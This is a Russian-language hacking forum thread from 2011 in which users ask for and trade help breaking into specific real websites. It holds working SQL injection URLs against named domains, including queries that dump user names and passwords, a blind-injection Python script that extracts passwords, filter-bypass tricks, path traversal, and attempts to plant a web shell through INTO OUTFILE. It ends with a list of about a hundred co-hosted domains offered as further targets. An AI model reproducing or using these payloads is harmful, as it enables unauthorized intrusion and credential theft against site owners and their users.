есть уязвимый сервер, могу заливать все типы файлов кроме:
$Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc', 'pl','bat','exe','dll','reg') ;
пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются
сервер под nginx, поэтому htaccess не пойдет
lfi не нашел
что можно еще поробовать?



Попробуй что нибудь из этого

Минифак по загрузке php кода вместо картинок (https://rdot.org/forum/showpost.php?p=1142&postcount=6)

qaz
15.06.2011, 23:41
Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692

FlaktW
15.06.2011, 23:45
qaz said:
Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692


Там нет скули.

qaz
15.06.2011, 23:48
FlaktW said:
Там нет скули.


какето?

http://uzmob.uz/profile.php?mode=viewprofile&u=692'

Could not update user data.

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3

UPDATE phpbb_users SET user_profile_view = '1' WHERE user_id =

Line : 27

File : usercp_viewprofile.php

FlaktW
16.06.2011, 00:00
qaz said:
какето?
http://uzmob.uz/profile.php?mode=viewprofile&u=692'
Could not update user data.
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3
UPDATE phpbb_users SET user_profile_view = '1' WHERE user_id =
Line : 27
File : usercp_viewprofile.php


Это не значит, что там есть скуля

Ups
16.06.2011, 02:05
Не могу запустить сплойт.


Code:
#!/usr/bin/python
#-*- coding: utf-8 -*-
# coded by BlueH4G _http://blueh4g.org_
import urllib,re
from time import sleep

def main() :
chk = re.compile("true_title")
url_begin="
http://t.blueh4g.org/technote7/board.php?board=freeboard&sort=(case%20("
url_end=")%20when%20true%20then%20no%20else%20uid%20end)%20 asc%20limit%200,1%23"
result="result : "
for spos in range(1,14):
ch=0
for i in range(1,8) :
sleep(0.05)

query="select%20substr((select%20lpad(bin(ascii(substr(m_ pass,"+str(spos)+",1))),7,0)%20from%20a_tn3_memberboard_list%20order %20by%20m_level%20desc%20limit%200,1),"+str(i)+",1)=1
data=urllib.urlopen(url_begin + query + url_end)
text=data.read()
if chk.search(text) :
ch += 2**(7-i)
result+=chr(ch)
print result
main()

C:\Python27>root.py

File "C:\Python27\root.py", line 9

url_begin="

^

SyntaxError: EOL while scanning string literal

foozzi
16.06.2011, 02:28
Ups said:
Не могу запустить сплойт.

Code:
#!/usr/bin/python
#-*- coding: utf-8 -*-
# coded by BlueH4G _http://blueh4g.org_
import urllib,re
from time import sleep

def main() :
chk = re.compile("true_title")
url_begin="
http://t.blueh4g.org/technote7/board.php?board=freeboard&sort=(case%20("
url_end=")%20when%20true%20then%20no%20else%20uid%20end)%20 asc%20limit%200,1%23"
result="result : "
for spos in range(1,14):
ch=0
for i in range(1,8) :
sleep(0.05)

query="select%20substr((select%20lpad(bin(ascii(substr(m_ pass,"+str(spos)+",1))),7,0)%20from%20a_tn3_memberboard_list%20order %20by%20m_level%20desc%20limit%200,1),"+str(i)+",1)=1
data=urllib.urlopen(url_begin + query + url_end)
text=data.read()
if chk.search(text) :
ch += 2**(7-i)
result+=chr(ch)
print result
main()

C:\Python27>root.py
File "C:\Python27\root.py", line 9
url_begin="
^
SyntaxError: EOL while scanning string literal



попробуй так url_begin="ссылко" или url_begin=" "

или ваще убери "

NaX[no]rT
16.06.2011, 04:50
Ups said:

Code:
C:\Python27>root.py
File "C:\Python27\root.py", line 17
query="select%20substr((select%20lpad(bin(ascii(substr(m_ pass,"+str(spos)+",
1))),7,0)%20from%20a_tn3_memberboard_list%20order% 20by%20m_level%20desc%20limit%
200,1),"+str(i)+",1)=1

^
SyntaxError: EOL while scanning string literal



привет, дружище) расскажи в общих словах почему ты даже не удосужился поискать в поисковой системе google по коду ошибки?

На твой взгляд что значит аббревиатура EOL?

Ups
16.06.2011, 12:18
Гуглил, но не понял как решить проблему.

kroŧ
16.06.2011, 14:42
Как это раскрутить

http://www.onradio.gr/play_old.php?id=245+union+AlL+sElEcT+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33

Unknown
16.06.2011, 14:44
Error Based же:

http://www.onradio.gr/play_old.php?id=245%20or%201%20group%20by%20concat (version(),floor(rand(0)*2))%20having%20min(0)%20o r%201%20--%20-

Unknown
16.06.2011, 14:58
kroŧ said:
Как это раскрутить
http://www.onradio.gr/play_old.php?id=245+union+AlL+sElEcT+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33


в чём проблема?


Code:
http://www.onradio.gr/play_old.php?id=-245+union+select+1,concat_ws%280x3a,version%28%29, database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33+--+

kroŧ
16.06.2011, 16:21
http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+--+

кроме ошибки ни чего не выводит версию не прозывает,

смог только имя базы узнать onrad2_radio

http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+FROM+users--+

Если при запросе union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33

ни выводит ни одну из цифр значит ни чего не сделать?

sourcec0de
16.06.2011, 16:28
kroŧ said:
http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+--+
кроме ошибки ни чего не выводит версию не прозывает,
смог только имя базы узнать onrad2_radio
http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+FROM+users--+
Если при запросе union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33
ни выводит ни одну из цифр значит ни чего не сделать?


зафолсите запрос, там есть вывод

http://www.onradio.gr/play_old.php?id=1+and(version()=user())+union+sele ct+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+

Unknown
17.06.2011, 01:04
Ребята инклуд локал на вин серве, залить ничего не могу, стоит иис, что б такое проинклюдить чтобы заполучить шелл?

shell_c0de
17.06.2011, 01:11
Lijzer said:
Ребята инклуд локал на вин серве, залить ничего не могу, стоит иис, что б такое проинклюдить чтобы заполучить шелл?


тынц (https://rdot.org/forum/showthread.php?t=365)

Unknown
17.06.2011, 01:22
2shell_code Знаю на зубок эту тему, вот только написал, что стоит IIS (а не апач), и да ошибку мускула сделать не могу, чтобы проинклюдить логи мускула. фтп не стоит.

з.ы. за отклик спасибо шелл

garaj
17.06.2011, 15:49
server-status и server-info

Открыты файлы sever-status и server-info.

Что злоумышленник может сделать, используя эту информацию?

Н-р:

http://ts-tvoimir.ru/server-status

Кроме как использовать эту информацию при ддосе, больше же ничего он не почерпнет из этих файлов?

GIG
17.06.2011, 18:06
Есть ли в IIS какие нибудь файлы содержащие пути к виртуальным каталогам?

kroŧ
18.06.2011, 13:25
http://www.sait.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,concat(grant ee,0x3a,is_grantable),5,6,7,8+from+information_sch ema.user_privileges

Выдает

'user'@'%':NO:USAGE 1 строка

http://www.sait.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,PRIVILEGE_TY PE,5,6,7,8+from+information_schema.user_privileges +where+IS_GRANTABLE=0x594553

пусто

делаю тоже самое но на localhost работает, может кто сталкивался с эти, хотел бы узнать права юзера но как это сделать?

Fooog
18.06.2011, 19:14
Пишу запрос +union+select+1,2,3,4,5,6,7,8+--

Нужной цифрой является 2. И когда я посылаю что то по типу: +union+select+1,user(),3,4,5,6,7,8+-- или +union+select+1,database(),3,4,5,6,7,8+-- предо мной загружается чистейший, белый лист.

В чем тут проблема? Как это исправить? С какой стороны подойти?

Expl0ited
18.06.2011, 22:00
unhex(hex(user())) или @@version

Expl0ited
18.06.2011, 22:02
Lijzer said:
Ребята инклуд локал на вин серве, залить ничего не могу, стоит иис, что б такое проинклюдить чтобы заполучить шелл?


Шелл в 98% /showpost.php?p=2691294&postcount=17

Fooog
19.06.2011, 00:27
Expl0ited, да, спасибо. @@version сработало. Вот @@user() @@database... Не то.

Можешь меня ткнуть носом где об этом почитать? То как так использовать подобное. Уж очень хочется ее раскрутить.

Konqi
19.06.2011, 02:45
Fooog said:
Expl0ited
, да, спасибо. @@version сработало. Вот @@user() @@database... Не то.
Можешь меня ткнуть носом где об этом почитать? То как так использовать подобное. Уж очень хочется ее раскрутить.


@@user и @@database не заработали, потому что нету таких системных переменных, походу у тебя фильтрация скобок

пробуй пост запросы

Expl0ited
19.06.2011, 09:03
Fooog said:
Expl0ited
, да, спасибо. @@version сработало. Вот @@user() @@database... Не то.
Можешь меня ткнуть носом где об этом почитать? То как так использовать подобное. Уж очень хочется ее раскрутить.


Ну стало ясно что фильтруются скобки, можешь спокойно крутить без их использования, просто отказавшись от функций, используя стандартный набор union select column from table where column=data limit 1

plaeer
19.06.2011, 16:29
Как вот это юзать - Apache 2.2.14 mod_isapi Dangling Pointer ??

Expl0ited
19.06.2011, 16:53
plaeer said:
Как вот это юзать - Apache 2.2.14 mod_isapi Dangling Pointer ??


http://securityreason.com/exploitalert/7905

plaeer
19.06.2011, 16:55
Expl0ited said:
http://securityreason.com/exploitalert/7905


Спасибо, но я уже в гугле побывал несколько раз. Как сплоиты под винду юзать вообще не представляю. С виндою не очень дружу...

stasiliy
20.06.2011, 13:46
Помогите плз.

Если $_POST не фильтруеться. НА сервере вот какая проверка идет:


if ($_POST['password'] == $passwd)
$_SESSION['_user'] = "admin";
else
echo"Error";


Что можно подставить, чтобы обойти этот IF ??

Спасибо

winstrool
20.06.2011, 14:31
stasiliy said:
Помогите плз.
Если $_POST не фильтруеться. НА сервере вот какая проверка идет:
Что можно подставить, чтобы обойти этот IF ??
Спасибо


если есть доступ к исходникам, то просто найди присвоеное значение переменной $passwd

kroŧ
20.06.2011, 14:48
Как можно обойти такой фильтр?

http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1

просто переходит на:

http://www.onlymelbourne.com.au/melbourne.php

Заранее благодарю за любой ответ.

stasiliy
20.06.2011, 15:11
kroŧ said:
Как можно обойти такой фильтр?
http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1
просто переходит на:
http://www.onlymelbourne.com.au/melbourne.php
Заранее благодарю за любой ответ.


Я думаю никак.

Будет редирект всегда, там фильтры на слова ORDER, UNION,SELECT

GroM88
20.06.2011, 16:07
Подобрал колличество полей. Вылезло Forbidden

можно как то обойти?)

_http://philshopping.com/product_info.php?id=302+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13--

freezed
20.06.2011, 16:23
GroM88 said:
Подобрал колличество полей. Вылезло
Forbidden
можно как то обойти?)
_http://philshopping.com/product_info.php?id=302+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13--


http://philshopping.com/product_info.php?id=302+and+1=0+union(select+1,2,3 ,4,5,6,7,8,9,10,11,12,13)+--+

stasiliy
20.06.2011, 17:24
Через Php-injection вытащил dbconfig.php

$dbhost="localhost";

Пробую подключиться, вместо localhost пишу ip домена.

К базе подключаеться , а вот mysql_connect_db не работает

В чем может быть проблемма?

спасибо

Konqi
20.06.2011, 17:41
stasiliy said:
Через Php-injection вытащил dbconfig.php
$dbhost="localhost";
Пробую подключиться, вместо localhost пишу ip домена.
К базе подключаеться , а вот mysql_connect_db не работает
В чем может быть проблемма?
спасибо


может mysql_select_db() ?

stasiliy
20.06.2011, 17:51
Konqi said:
может mysql_select_db() ?


Да, просто ошшибку сделал когда вам писал.



вот что пишет


Access denied for user 'user1_style_adm'@'%' to database 'user1_style'

Konqi
20.06.2011, 17:53
stasiliy said:
Да, просто ошшибку сделал когда вам писал.


вот что пишет


http://google.ru/translate

нету доступа к этой базе

Nek1t
20.06.2011, 17:56
Не получается вывести определенное поле из таблицы MySQL. Причем поле довольно странное.


SELECT count(field) FROM table


1234


SELECT count(field) FROM table WHERE LENGTH(field)>0


1234


SELECT LENGTH(field) FROM table LIMIT (1/10/1000),1


0

Пробовал AES_(EN/DE)CRYPT, HEX - на страницу ничего не выводится.

winstrool
20.06.2011, 18:06
stasiliy said:
Через Php-injection вытащил dbconfig.php
$dbhost="localhost";
Пробую подключиться, вместо localhost пишу ip домена.
К базе подключаеться , а вот mysql_connect_db не работает
В чем может быть проблемма?
спасибо


если пытаешься удоленно подключиться, то часто бывает что отключена функция удаленного в mysql, попробуй поискать phpmyadmin или cpanel, от туда и пытайся зайти...

foozzi
20.06.2011, 18:54
на сайте в поиске ввожу "/XSS/?> оно мне выдает найдено 0 записей по запросу '\"/XSS/?>'

подставляю еще ' выдает тоже самое только '\'\\\"/XSS/?>' подставляю еще ' выходит '\'\\\'\\\\\\\"/XSS/?>' и после этого когда я подставляю ' выдает результат поиска Оо - первых 20 записей категории

XSS ?

Seravin
20.06.2011, 19:38
alexvrn said:

Code:
SQL Ошибка для [select id from phpshop_categories where seoname='-3'/**//*!union*//**//*!select*//**/version(),1,2,3,4,5,6--+'' limit 1]
The used SELECT statements have a different number of columns

-3'/**//*!union*//**//*!select*//**/version(),1,2,3,4,5,6--+'


ты вообще читаешь что оно тебе написало?

select id from phpshop_categories where seoname='-3'/**//*!union*//**//*!select*//**/version(),1,2,3,4,5,6--+'' limit 1

Seravin
20.06.2011, 19:41
foozzi said:
на сайте в поиске ввожу "/XSS/?> оно мне выдает найдено 0 записей по запросу '\"/XSS/?>'
подставляю еще ' выдает тоже самое только '\'\\\"/XSS/?>' подставляю еще ' выходит '\'\\\'\\\\\\\"/XSS/?>' и после этого когда я подставляю ' выдает результат поиска Оо - первых 20 записей категории
XSS ?


https://forum.antichat.net/thread104591.html

foozzi
20.06.2011, 19:48
есть ли русский фак по nikto 2?

самому сложновато разобраться прописую например perl nikto.pl -h 91.20*.***.94

сканирует только директории и файлы.

Что прописывать например для обнаружения sql или php inj?

(Ubuntu)

Cybersteger
20.06.2011, 20:30
kroŧ said:
Как можно обойти такой фильтр?
http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1
просто переходит на:
http://www.onlymelbourne.com.au/melbourne.php
Заранее благодарю за любой ответ.


и stasiliy

можна так


Code:
http://www.onlymelbourne.com.au/melbourne.php?id=371+%61nd+1=0+%75nion+%73elect+(% 73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(nul l)%66rom(%69nformation_schema.%63olumns)%77here
(%74able_schema!=0x696e666f726d6174696f6e5f7363686 56d61)%61nd(0x00)%69n
(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,tabl e_name,0x3a,%63olumn_name))))x)

пс:убрать пробели

ne0k
20.06.2011, 22:47
Доброго времени суток уважаемые,

Есть вопрос:

1. Эксплуатирую одну очень важную blind inj.

Пользователь, из под которого запущена БД привилегированный, т.е. имеет права FILE_PRIV = Y, INSERT_PRIV = Y и тд..

При использовании конструкции


Code:
SELECT LOAD_FILE('/etc/passwd')

я могу получить список из passwd, и ничего кроме /etc/passwd я прочитать не могу.. Могу ли я читать что нибудь кроме passwd, в той же /etc/ или в любом другом каталоге? Если да, то у меня не выходит.. Читает только /etc/passwd... Может кто нибудь объяснить?

З.Ы: БД, запросы к которой я посылаю, находится на другом серве, т.е. не на том же сервере что сам сайт.

1.1. Возможно ли как нибудь узнать, каков IP адрес у этого сервера с MySQL ?

2. Пытаюсь залить веб шелл, не выходит.


Code:
SELECT '' FROM mysq.user INTO OUTFILE '/rdb-cluster/sites/somesite.com/htdocs/images/info.php'

АХТУНГ, вопрос: Выполняя запрос на заливку шелла, я указываю веб путь на сервере с MySQL или же тот, где используется сценарий? А если MySQL поднят на машине, где вообще нет веб директорий.. То бишь апачи не поднят.. Я так понимаю про шелл через скулю забыть?

Если же веб путь указывать надо на сервере с апачи, то вот:

FILE_PRIV = Y

Full path взятый из phpinfo самого сайта = /rdb-cluster/sites/somesite.com/htdocs/

По адресу foo.somesite.com/.svn/ я нашел исходники, в которых подключались конфиги с подключением к БД:


PHP:
include('/data/vhosts/www.somesite.com/htdocs/inc/conf.php')

То бишь: /data/vhosts/www.somesite.com/htdocs/

Из файла entries в той же /.svn/, я выдернул следующую запись:

/home/user/websites/foo.somesite.com/ .....

Я немного запутался, и голова идет кругом, подскажите пожалуйста, откуда столько путей? Какой из них "тот самый" ?

С уважением, надеюсь кто нибудь поможет!

plaeer
21.06.2011, 01:39
support/button.php?image=asdasd

Получаю ошибку

Warning: fopen(locales/ru/button/asdasd_off.gif) [function.fopen]: failed to open stream: No such file or directory in [patch]\support\button.php on line 27

no image

Я так понимаю это пхп инекция? Как её заюзать? Сервер на винде.

M_script
21.06.2011, 07:10
plaeer said:
Я так понимаю это пхп инекция?


Нет, это не пхп инъекция.

Можешь использовать для XSS.

Возможно, получится читать файлы на сервере. Например так:

support/button.php?image=../../../../../../../[patch]/support/button.php%00

M_script
21.06.2011, 07:20
ne0k

1. Какие еще файлы ты пытался читать?

1.1. Почитать скрипты, которые обращаются к БД

2. На сервере с MySQL

M_script
21.06.2011, 07:33
kroŧ said:
Как обойти фильтрацию кавычек при заливки файла?


INTO OUTFILE и INTO DUMPFILE обязательно требуют кавычек. В обычных условиях залить ничего не получится. Но исключения бывают, все зависит от конкретного случая.

plaeer
21.06.2011, 14:47
M_script said:
Нет, это не пхп инъекция.
Можешь использовать для XSS.
Возможно, получится читать файлы на сервере. Например так:
support/button.php?image=../../../../../../../[patch]/support/button.php%00


Спасибо, добрый человек. Но что не работает. Делаю вот так support/button.php?image=../../../../../../../C:/Server/home/localhost/support/button.php%00. Получаю "Wrong parameter used or absent: image" Что не так?

XSS на этом сайтике чёртова куча, но толк от них, если там даже админки нету.

foozzi
21.06.2011, 16:47
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,2,table_name+from+iNformation_sc hema.tables+--+

почему не выводит результат? ошибки тоже нет, в коде смотрел

d1v
21.06.2011, 16:57
foozzi said:
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,2,table_name+from+iNformation_sc hema.tables+--+
почему не выводит результат? ошибки тоже нет, в коде смотрел


хекс хекс хекс

http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,unhex(hex(version())),3--

foozzi
21.06.2011, 17:21
спасибо буду знать

вот еще blind

http://www.bispublishers.nl/bookpage.php?id=142+and+ascii(lower(substring(user (),1,1)))

d1v
21.06.2011, 17:28
[QUOTE="foozzi"]
foozzi said:
спасибо буду знать
вот еще blind
http://www.bispublishers.nl/bookpage.php?id=142+and+ascii(lower(substring(user (),1,1)))

foozzi
21.06.2011, 17:35
d1v said:
с чего ты взял что она слепая? вывод в самом низу.

HTML:
http://www.bispublishers.nl/bookpage.php?id=-142+union+select+1,2,concat_ws(0x3a,name,password) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46+from+users--



Оо фейл! я проверял у меня выводило 48 полей! да и запрос and 1=2 была пустая страница, такое в blind я читал

M_script
21.06.2011, 17:57
plaeer said:
Что не так?


Во-первых, букву диска писать не надо. Во-вторых, я написал "Возможно, получится читать файлы на сервере. Например так". Все зависит от конкретного сайта, без ссылки нельзя ничего точно сказать.

ne0k
21.06.2011, 18:17
M_script

MySQL на дебиане 5.0, какие файлы в принципе возможно прочитать? Пробовал читать все подряд, и /etc/mysql/mysqlaccess.conf и /var/www/index.html (по моему по дефолту присутствует, не?) но ничего кроме /etc/passwd..

Почитать скрипты обращающиеся к MySQL не могу, мои запросы ведь исполняются на сервере MySQL, как я могу прочитать скрипты лежащие совсем на другом сервере?.. php include нет, ничего нет.. Кроме проклятой скули.. Нужен очень шелл.. Ну или вся БД, блайндом я ее 3 года дампить буду...

Expl0ited
21.06.2011, 18:23
ne0k said:
M_script
MySQL на дебиане 5.0, какие файлы в принципе возможно прочитать? Пробовал читать все подряд, и /etc/mysql/mysqlaccess.conf и /var/www/index.html (по моему по дефолту присутствует, не?) но ничего кроме /etc/passwd..
Почитать скрипты обращающиеся к MySQL не могу, мои запросы ведь исполняются на сервере MySQL, как я могу прочитать скрипты лежащие совсем на другом сервере?.. php include нет, ничего нет.. Кроме проклятой скули.. Нужен очень шелл.. Ну или вся БД, блайндом я ее 3 года дампить буду...


/thread49775.html

Expl0ited
21.06.2011, 18:51
ne0k said:
Expl0ited
Спасибо за ссылку, как раз что нужно.. Но... Увы, скуля была не на сайте студента 5го курса, а серьезной и немало известной компании.. Кстати мой самый крупный успех в эксплуатировании скулей.. К чему веду, мало того, что дыру они закрыли буквально с час назад, но и сервера все свои перенесли, даже тема поднята, мол двигаем все
Всем спасибо, если кому интересно что за проект был, могу скинуть ссыль в ПМ.


Кидай посмотрим )

foozzi
21.06.2011, 21:38
на сайте есть sql inj

подобрал поля с помощью GROUP BY потому что ORDER BY не прокатило

пробую узнать версию, все равно выдает ошибку, какая то мудреная inj я с такой не сталкивался подскажите

d1v
21.06.2011, 21:41
foozzi said:
на сайте есть sql inj
подобрал поля с помощью GROUP BY потому что ORDER BY не прокатило
пробую узнать версию, все равно выдает ошибку, какая то мудреная inj я с такой не сталкивался подскажите


ссылку в студию

foozzi
21.06.2011, 21:41
d1v said:
ссылку в студию


http://www.fbskins.com/facebook-layouts/cat.php?id=75

winstrool
21.06.2011, 21:42
foozzi said:
на сайте есть sql inj
подобрал поля с помощью GROUP BY потому что ORDER BY не прокатило
пробую узнать версию, все равно выдает ошибку, какая то мудреная inj я с такой не сталкивался подскажите


там могут быть фильтрации, если есть вывод ошибки то попробуй через блинд, а вообще такие вопросы лудше с линками кидать, дабы можно что то было адекватней ответить по ситуации.

Expl0ited
21.06.2011, 21:51
foozzi said:
http://www.fbskins.com/facebook-layouts/cat.php?id=75


блайнд


Code:
http://www.fbskins.com/facebook-layouts/cat.php?id=(75)and(1)=if(mid((select(version())),1 ,1)=5,1,0)--+

foozzi
22.06.2011, 00:26
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,table_name+fro m+information_schema.tables+--+

почему выдает ошибку 500 ?

Melfis
22.06.2011, 00:58
http://notice.spacash.com/2257.php?id=-2902+union+select+5,unhex(hex(version())),666,666, 666,666,666,666,5,1000--+

ответ на твой вопрос.

версия 4+

попугай
22.06.2011, 01:23
M_script said:
foozzi
из-за "from"
http://notice.spacash.com/2257.php?id=-2902+--+from
http://notice.spacash.com/2257.php?id=-2902+--+frm



зато http://notice.spacash.com/2257.php?id=-2902/*from*/

M_script
22.06.2011, 01:26
попугай, ошибся.

http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+from

http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*from*/

http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+frm

http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*frm*/

http://notice.spacash.com/2257.php?id=-2902/*select+*//*from*/

upd:

http://notice.spacash.com/2257.php?id=-2902+union+select/**/1,2,3,4,5,6,7,8,9,10+from+XXX+--+

Expl0ited
22.06.2011, 01:40
Code:
notice.spacash.com/2257.php?id=(0)union+select(1),hex(version()),3,4, 5,6,7,8,9,(10)from(table)--+

[upd] не успел чуток )

Unknown
22.06.2011, 01:44
Sql injection на Sybase кто нибудь пробивал?

попугай
22.06.2011, 01:44
M_script said:
попугай
, ошибся.
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+from
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*from*/
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+frm
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*frm*/
upd:
http://notice.spacash.com/2257.php?id=-2902/*select+*//*from*/



Точно, фильтруется from. Только как то избирательно.

http://notice.spacash.com/2257.php?id=2902+from

M_script
22.06.2011, 02:32
попугай said:
Точно, фильтруется from. Только как то избирательно.


Фильтруется, если между "select " и "from" есть любой символ.

BigBear
22.06.2011, 08:15
Есть скуля в поиске, но никак не получается составить истинное выражение для правильного вывода.

Думал что так пройдёт, но всё равно тоже ругается


Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='('1

UPD Для обрезки запроса только ядовитые нули помогают, но запрос всё равно остаётся ложным


Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='1%00

Expl0ited
22.06.2011, 10:40
BigBear said:
Есть скуля в поиске, но никак не получается составить истинное выражение для правильного вывода.
Думал что так пройдёт, но всё равно тоже ругается

Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='('1

UPD Для обрезки запроса только ядовитые нули помогают, но запрос всё равно остаётся ложным

Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='1%00



Так хорошо задал вопрос, и так нелепо упустил скобку во внимании


Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(select(@x)from(select(@ x:=0x00),(select(0)from(information_schema.columns )where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,tab le_schema,0x2e,table_name,0x3a,column_name))))x),3 ,4,5,6,7,8)--+1

BigBear
22.06.2011, 13:06
Expl0ited said:
Так хорошо задал вопрос, и так нелепо упустил скобку во внимании

Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(select(@x)from(select(@ x:=0x00),(select(0)from(information_schema.columns )where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,tab le_schema,0x2e,table_name,0x3a,column_name))))x),3 ,4,5,6,7,8)--+1



Огромное спасибо, разобрался.

Единственная проблема - данные из userlist не подходят для админки


Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(2),3,4,concat_ws(0x3a,u ser,pass),6,7,8+from+userlist+limit+0,1)--+1

А Админка тут


Code:
http://sport-razgrom.ru/admin

Где ещё помимо мускула может лежать пасс от админки ?

Expl0ited
22.06.2011, 13:11
Может быть банальная проверка


PHP:


[upd] да там бейсик авторизация, пароль хранится в файле.

BigBear
22.06.2011, 13:27
Печально. Обломался шелл значит.

Expl0ited
22.06.2011, 13:42
BigBear said:
Печально. Обломался шелл значит.


Вообщем, если тебе ну очень интересно повысить свои права до веб-шелла на этом ресурсе, то я бы на твоем месте не расстраивался, а искал дальше. Тем более, что на сервере, по реверсу еще порядка 200 сайтов, на одном из них уж точно можно будет залиться, а действовать локально часто более результативно, чем извне.

Вот списочек сайтов:


Code:
segway-city.ru
www.abcde.by
www.germida.com
www.sjp.su
gay-country.ru
www.vashyprava.ru
zaschita.name
agnivo.ru
www.samara777.ru
tpgrad.ru
www.zazerye.by
www.zaitsevmedia.ru
www.gualcolors.ru
www.podaroknebes.ru
af-school.ru
bookfeel.ru
www.stylish-stuff.ru
asgardstudio.ru
igroson.ru
rubezh-kaluga.ru
skottishfold.ru
lostidea.ru
mobilaport.ru
www.farwel.ru
pos-reklama.ru
servers-saintp.ru
honda-electric.ru
vabene-mobili.ru
www.server-life.ru
games4pro.com
www.akva-dv.ru
www.avtovek73.ru
mebelshik-msk.ru
www.realborneo.ru
www.photoka.info
www.violetta.su
www.ymuhin.ru
it-otdel.org
shko-la.ru
www.26-it.ru
cookerblog.ru
charter-vip.com
zdphoto.ru
www.mobport.ru
citymotors.ru
www.kamerton-realty.ru
adventure-team.pro
21antenna.ru
cleanprint.ru
www.air-industry.ru
proactive-capital.com
worldlegend.ru
www.kanca.ru
insideinform.ru
salon-flamingo.ru
agspec.ru
3d.globatek.ru
ru925.ru
smerchserver.ru
www.catportal.ru
www.zhostovo.com
www.edinstwo.ru
mardanov.info
zadelkin.ru
www.uralteploservis.ru
tronlegacy.biz
www.turist-vodnik.ru
oletta.ru
pfiff.ru
stolnikov-motors.ru
www.belwebdesign.com
parketmoskva.ru
doskarus.ru
www.lingvoprofessional.ru
www.rosstroy.me
www.baki-n.ru
ibfd-fund.com
barnaulkapstroy.ru
www.kuzaluplast.ru
shtuchkipro.ru
www.openeyes.ru
ribak-ribaka.ru
nnbuyback.com
belayagora.info
el-svoboda.ru
vash-shans.com
forum.servers-saintp.ru
mertix.ru
domenhost.com
forex-grail.ru
www.unplate.com
www.it-26.ru
eucvot.net
imagophoto.ru
pizza-stavropol.ru
1seconds.ru
www.masterfreetzi.ru
www.diezel-truck.ru
